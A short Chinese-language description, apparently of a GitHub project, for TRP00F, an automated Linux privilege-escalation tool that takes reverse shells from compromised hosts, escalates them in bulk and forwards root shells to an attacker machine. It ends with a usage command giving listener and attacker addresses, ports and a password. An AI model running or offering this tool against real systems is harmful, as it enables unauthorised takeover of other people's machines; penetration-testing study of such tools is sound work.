TRP00F
项目地址:https://github.com/MartinxMax/trp00f
TRP00F 是一个完全自动化的 Linux 权限提升工具。被控制的端点通过反向 Shell 连接到权限提升机器,而权限提升机器将自动将权限提升到指定的攻击者机器。
TRP00F 是一个活跃维护和更新的工具,随着时间的推移,功能不断增加。
有趣的一点是,你可以将 TRP00F 部署在其他服务器上,充当一个“剥皮机”。任何连接到 TRP00F 的主机,其 Shell 都会尝试进行批量权限提升,然后将提升后的 Shell 连接到攻击者的机器上。
使用
$ python3 trp00f.py -h
探测并获取反向Shell
$ python3 trp00f.py --lhost 10.10.16.18 --lport 10022 --rhost 10.10.16.18 --rport 10090 --pkhttpport 10033 --lxhttpport 10091 --password 'admin@it'
